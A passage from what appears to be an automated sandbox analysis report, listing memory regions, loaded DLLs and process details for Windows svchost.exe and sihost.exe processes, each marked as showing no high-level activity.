| msvcp140.dll | 0x7ff8e5f30000 | 0x7ff8e5fcefff | Memory Mapped File | rwx |
|
|
|
- |
| vcruntime140.dll | 0x7ff8e5fd0000 | 0x7ff8e5fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| cabinet.dll | 0x7ff8e5ff0000 | 0x7ff8e6016fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7ff8e6330000 | 0x7ff8e6365fff | Memory Mapped File | rwx |
|
|
|
- |
| ucrtbase.dll | 0x7ff8e6c30000 | 0x7ff8e6d21fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x7ff8e7160000 | 0x7ff8e71c7fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x7ff8e7280000 | 0x7ff8e7299fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x7ff8e72a0000 | 0x7ff8e72b5fff | Memory Mapped File | rwx |
|
|
|
- |
| samcli.dll | 0x7ff8e76f0000 | 0x7ff8e7707fff | Memory Mapped File | rwx |
|
|
|
- |
| wkscli.dll | 0x7ff8e7cd0000 | 0x7ff8e7ce5fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7ff8e8460000 | 0x7ff8e846afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7ff8e8480000 | 0x7ff8e84b7fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ff8e8ad0000 | 0x7ff8e8ae2fff | Memory Mapped File | rwx |
|
|
|
- |
| gpapi.dll | 0x7ff8e9cd0000 | 0x7ff8e9cf2fff | Memory Mapped File | rwx |
|
|
|
- |
| tdh.dll | 0x7ff8e9d00000 | 0x7ff8e9df7fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x7ff8ea000000 | 0x7ff8ea00bfff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7ff8ea010000 | 0x7ff8ea035fff | Memory Mapped File | rwx |
|
|
|
- |
| schannel.dll | 0x7ff8ea150000 | 0x7ff8ea1c3fff | Memory Mapped File | rwx |
|
|
|
- |
| dpapi.dll | 0x7ff8ea1d0000 | 0x7ff8ea1d9fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ff8ea270000 | 0x7ff8ea2a2fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ff8ea360000 | 0x7ff8ea37efff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x7ff8ea3c0000 | 0x7ff8ea467fff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 40 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #76: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #76 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k appmodel |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x600 |
| Parent PID | 0x1e8 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeTcbPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePermanentPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege |
| Thread IDs |
0x
AC0
0x
9F8
0x
97C
0x
978
0x
6CC
0x
6C8
0x
604
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x0000005120a40000 | 0x5120a40000 | 0x5120a4ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0x5120a50000 | 0x5120a50fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000005120a60000 | 0x5120a60000 | 0x5120a73fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005120a80000 | 0x5120a80000 | 0x5120afffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005120b00000 | 0x5120b00000 | 0x5120b03fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005120b10000 | 0x5120b10000 | 0x5120b10fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005120b20000 | 0x5120b20000 | 0x5120b21fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005120b30000 | 0x5120b30000 | 0x5120b30fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005120b40000 | 0x5120b40000 | 0x5120b46fff | Private Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0x5120b50000 | 0x5120b5ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5120b60000 | 0x5120b6ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5120b70000 | 0x5120b7ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5120b80000 | 0x5120b8ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5120b90000 | 0x5120b9ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5120ba0000 | 0x5120baffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5120bb0000 | 0x5120bbffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005120bc0000 | 0x5120bc0000 | 0x5120bc0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005120bd0000 | 0x5120bd0000 | 0x5120bd0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005120be0000 | 0x5120be0000 | 0x5120be0fff | Pagefile Backed Memory | r |
|
|
|
- |
| vedatamodel.edb | 0x5120bf0000 | 0x5120bfffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005120c00000 | 0x5120c00000 | 0x5120cfffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x5120d00000 | 0x5120dbdfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000005120dc0000 | 0x5120dc0000 | 0x5120e7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| staterepository-machine.srd-shm | 0x5120e80000 | 0x5120e87fff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000005120e90000 | 0x5120e90000 | 0x5120e90fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000005120ea0000 | 0x5120ea0000 | 0x5120ea0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005120eb0000 | 0x5120eb0000 | 0x5120eb0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005120ec0000 | 0x5120ec0000 | 0x5120ecffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000005120ed0000 | 0x5120ed0000 | 0x5120edffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000005120ee0000 | 0x5120ee0000 | 0x5120eeffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000005120ef0000 | 0x5120ef0000 | 0x5120efffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000005120f00000 | 0x5120f00000 | 0x5120f00fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005120f10000 | 0x5120f10000 | 0x5120f10fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005120f20000 | 0x5120f20000 | 0x5120f20fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005120f30000 | 0x5120f30000 | 0x5120f36fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005120f40000 | 0x5120f40000 | 0x5120f4ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000005120f50000 | 0x5120f50000 | 0x5120f5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000005120f60000 | 0x5120f60000 | 0x5120f6ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000005120f70000 | 0x5120f70000 | 0x5120f7ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000005120f80000 | 0x5120f80000 | 0x5120f83fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005120f90000 | 0x5120f90000 | 0x5120f91fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005120fa0000 | 0x5120fa0000 | 0x5120fa0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005120fb0000 | 0x5120fb0000 | 0x5120fb0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005120fc0000 | 0x5120fc0000 | 0x5120fdffff | Private Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0x5120fe0000 | 0x5120feffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5120ff0000 | 0x5120ffffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005121000000 | 0x5121000000 | 0x51210fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005121100000 | 0x5121100000 | 0x5121287fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005121290000 | 0x5121290000 | 0x5121410fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005121420000 | 0x5121420000 | 0x512151ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005121520000 | 0x5121520000 | 0x512161ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x5121620000 | 0x5121956fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005121a60000 | 0x5121a60000 | 0x5121b5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005121b60000 | 0x5121b60000 | 0x5121c5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005121c60000 | 0x5121c60000 | 0x5121d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005121d60000 | 0x5121d60000 | 0x5122d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005122d60000 | 0x5122d60000 | 0x5132d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005132d60000 | 0x5132d60000 | 0x5142d5ffff | Private Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0x5142d60000 | 0x5142d6ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142d70000 | 0x5142d7ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142d80000 | 0x5142d8ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142d90000 | 0x5142d9ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142da0000 | 0x5142daffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142db0000 | 0x5142dbffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142dc0000 | 0x5142dcffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142dd0000 | 0x5142ddffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142de0000 | 0x5142deffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142df0000 | 0x5142dfffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142e00000 | 0x5142e0ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142e10000 | 0x5142e1ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142e20000 | 0x5142e2ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005142e30000 | 0x5142e30000 | 0x5142eaffff | Private Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0x5142eb0000 | 0x5142ebffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005142ec0000 | 0x5142ec0000 | 0x5142ec0fff | Private Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0x5142ed0000 | 0x5142edffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142ee0000 | 0x5142eeffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142ef0000 | 0x5142efffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142f00000 | 0x5142f0ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142f10000 | 0x5142f1ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142f20000 | 0x5142f2ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142f30000 | 0x5142f3ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142f40000 | 0x5142f4ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142f50000 | 0x5142f5ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142f60000 | 0x5142f6ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142f70000 | 0x5142f7ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142f80000 | 0x5142f8ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142f90000 | 0x5142f9ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142fa0000 | 0x5142faffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142fb0000 | 0x5142fbffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142fc0000 | 0x5142fcffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142fd0000 | 0x5142fdffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142fe0000 | 0x5142feffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5142ff0000 | 0x5142ffffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143000000 | 0x514300ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143010000 | 0x514301ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143020000 | 0x514302ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143030000 | 0x514303ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143040000 | 0x514304ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143050000 | 0x514305ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143060000 | 0x514306ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143070000 | 0x514307ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000005143080000 | 0x5143080000 | 0x51430a9fff | Pagefile Backed Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0x51430b0000 | 0x51430bffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x51430c0000 | 0x51430cffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x51430d0000 | 0x51430dffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x51430e0000 | 0x51430effff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x51430f0000 | 0x51430fffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143100000 | 0x514310ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143210000 | 0x514321ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143220000 | 0x514322ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143230000 | 0x514323ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143240000 | 0x514324ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143250000 | 0x514325ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143260000 | 0x514326ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143270000 | 0x514327ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143280000 | 0x514328ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143290000 | 0x514329ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x51432a0000 | 0x51432affff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x51432b0000 | 0x51432bffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x51432c0000 | 0x51432cffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x51432d0000 | 0x51432dffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x51432e0000 | 0x51432effff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000051432f0000 | 0x51432f0000 | 0x51432f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005143300000 | 0x5143300000 | 0x51433fffff | Private Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0x5143400000 | 0x514340ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143410000 | 0x514341ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143420000 | 0x514342ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005143430000 | 0x5143430000 | 0x514352ffff | Private Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0x5143530000 | 0x514353ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143540000 | 0x514354ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143550000 | 0x514355ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143560000 | 0x514356ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143570000 | 0x514357ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143580000 | 0x514358ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143590000 | 0x514359ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x51435a0000 | 0x51435affff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x51435b0000 | 0x51435bffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x51435c0000 | 0x51435cffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x51435d0000 | 0x51435dffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x51435e0000 | 0x51435effff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x51435f0000 | 0x51435fffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143600000 | 0x514360ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143610000 | 0x514361ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005143620000 | 0x5143620000 | 0x5143620fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005143630000 | 0x5143630000 | 0x5143630fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005143640000 | 0x5143640000 | 0x5143640fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005143650000 | 0x5143650000 | 0x5143650fff | Private Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0x5143660000 | 0x514366ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0x5143670000 | 0x514367ffff | Memory Mapped File | r |
|
|
|
- |
|
For performance reasons, the remaining 54 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #77: sihost.exe
0
0
| Information | Value |
|---|---|
| ID | #77 |
| File Name | c:\windows\system32\sihost.exe |
| Command Line | sihost.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x778 |
| Parent PID | 0x330 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C20
0x
BA8
0x
8A8
0x
850
0x
2BC
0x
44C
0x
410
0x
7FC
0x
7F0
0x
7EC
0x
7E4
0x
79C
0x
798
0x
794
0x
77C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000d7077e0000 | 0xd7077e0000 | 0xd7077effff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000d7077f0000 | 0xd7077f0000 | 0xd7077f6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000d707800000 | 0xd707800000 | 0xd707813fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000d707820000 | 0xd707820000 | 0xd70789ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000d7078a0000 | 0xd7078a0000 | 0xd7078a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000d7078b0000 | 0xd7078b0000 | 0xd7078b1fff | Private Memory | rw |
|
|
|
- |
| private_0x000000d7078c0000 | 0xd7078c0000 | 0xd7078c6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000d7078d0000 | 0xd7078d0000 | 0xd7078d0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000d7078e0000 | 0xd7078e0000 | 0xd7078e0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000d7078f0000 | 0xd7078f0000 | 0xd7078f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000d707900000 | 0xd707900000 | 0xd707900fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000d707910000 | 0xd707910000 | 0xd707a0ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xd707a10000 | 0xd707acdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000d707ad0000 | 0xd707ad0000 | 0xd707b4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000d707b50000 | 0xd707b50000 | 0xd707b79fff | Pagefile Backed Memory | rw |
|
|
|
- |
| s-1-5-21-1462094071-1423818996-289466292-1000.pckgdep | 0xd707b80000 | 0xd707b80fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000d707ba0000 | 0xd707ba0000 | 0xd707baffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000d707bb0000 | 0xd707bb0000 | 0xd707d37fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000d707d40000 | 0xd707d40000 | 0xd707ec0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000d707ed0000 | 0xd707ed0000 | 0xd7092cffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000d7092d0000 | 0xd7092d0000 | 0xd7093cffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xd7093d0000 | 0xd709706fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000d709710000 | 0xd709710000 | 0xd70978ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d709790000 | 0xd709790000 | 0xd70980ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d709810000 | 0xd709810000 | 0xd70988ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d709890000 | 0xd709890000 | 0xd70990ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d709910000 | 0xd709910000 | 0xd70998ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d709990000 | 0xd709990000 | 0xd709a0ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d709a70000 | 0xd709a70000 | 0xd709a7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d709a80000 | 0xd709a80000 | 0xd709b7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d709b80000 | 0xd709b80000 | 0xd70a37ffff | Private Memory | - |
|
|
|
- |
| private_0x000000d70a400000 | 0xd70a400000 | 0xd70a47ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d70a480000 | 0xd70a480000 | 0xd70a4fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d70a500000 | 0xd70a500000 | 0xd70a57ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0xd70a580000 | 0xd70a65efff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000d70a6e0000 | 0xd70a6e0000 | 0xd70a75ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d70a760000 | 0xd70a760000 | 0xd70a7dffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d70a7e0000 | 0xd70a7e0000 | 0xd70a85ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d70a860000 | 0xd70a860000 | 0xd70a95ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d70a960000 | 0xd70a960000 | 0xd70a9dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffcf0000 | 0x7df5ffcf0000 | 0x7ff5ffceffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff6f2f4a000 | 0x7ff6f2f4a000 | 0x7ff6f2f4bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6f2f4c000 | 0x7ff6f2f4c000 | 0x7ff6f2f4dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6f2f4e000 | 0x7ff6f2f4e000 | 0x7ff6f2f4ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6f2f50000 | 0x7ff6f2f50000 | 0x7ff6f2f51fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6f2f54000 | 0x7ff6f2f54000 | 0x7ff6f2f55fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6f2f56000 | 0x7ff6f2f56000 | 0x7ff6f2f57fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6f2f58000 | 0x7ff6f2f58000 | 0x7ff6f2f59fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6f2f5c000 | 0x7ff6f2f5c000 | 0x7ff6f2f5dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6f2f5e000 | 0x7ff6f2f5e000 | 0x7ff6f2f5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff6f2f60000 | 0x7ff6f2f60000 | 0x7ff6f305ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6f3060000 | 0x7ff6f3060000 | 0x7ff6f3082fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6f3083000 | 0x7ff6f3083000 | 0x7ff6f3084fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6f3085000 | 0x7ff6f3085000 | 0x7ff6f3086fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6f3087000 | 0x7ff6f3087000 | 0x7ff6f3088fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6f3089000 | 0x7ff6f3089000 | 0x7ff6f308afff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6f308b000 | 0x7ff6f308b000 | 0x7ff6f308cfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6f308d000 | 0x7ff6f308d000 | 0x7ff6f308efff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6f308f000 | 0x7ff6f308f000 | 0x7ff6f308ffff | Private Memory | rw |
|
|
|
- |
| sihost.exe | 0x7ff6f3d00000 | 0x7ff6f3d15fff | Memory Mapped File | rwx |
|
|
|
- |
| staterepository.core.dll | 0x7ff8dc6e0000 | 0x7ff8dc778fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.staterepository.dll | 0x7ff8dc780000 | 0x7ff8dca11fff | Memory Mapped File | rwx |
|
|
|
- |
| licensemanagerapi.dll | 0x7ff8deea0000 | 0x7ff8deeabfff | Memory Mapped File | rwx |
|
|
|
- |
| twinui.appcore.dll | 0x7ff8deeb0000 | 0x7ff8df0bcfff | Memory Mapped File | rwx |
|
|
|
- |
| execmodelproxy.dll | 0x7ff8df190000 | 0x7ff8df1a4fff | Memory Mapped File | rwx |
|
|
|
- |
| sharehost.dll | 0x7ff8df220000 | 0x7ff8df2c4fff | Memory Mapped File | rwx |
|
|
|
- |
| ondemandbrokerclient.dll | 0x7ff8df2d0000 | 0x7ff8df2e0fff | Memory Mapped File | rwx |
|
|
|
- |
| appcontracts.dll | 0x7ff8df2f0000 | 0x7ff8df39bfff | Memory Mapped File | rwx |
|
|
|
- |
| notificationplatformcomponent.dll | 0x7ff8df3a0000 | 0x7ff8df3acfff | Memory Mapped File | rwx |
|
|
|
- |
| execmodelclient.dll | 0x7ff8df3b0000 | 0x7ff8df3f2fff | Memory Mapped File | rwx |
|
|
|
- |
| wpportinglibrary.dll | 0x7ff8df410000 | 0x7ff8df418fff | Memory Mapped File | rwx |
|
|
|
- |
| modernexecserver.dll | 0x7ff8df420000 | 0x7ff8df4f7fff | Memory Mapped File | rwx |
|
|
|
- |
| appointmentactivation.dll | 0x7ff8df500000 | 0x7ff8df521fff | Memory Mapped File | rwx |
|
|
|
- |
| activationmanager.dll | 0x7ff8df530000 | 0x7ff8df58dfff | Memory Mapped File | rwx |
|
|
|
- |
| edputil.dll | 0x7ff8df590000 | 0x7ff8df5befff | Memory Mapped File | rwx |
|
|
|
- |
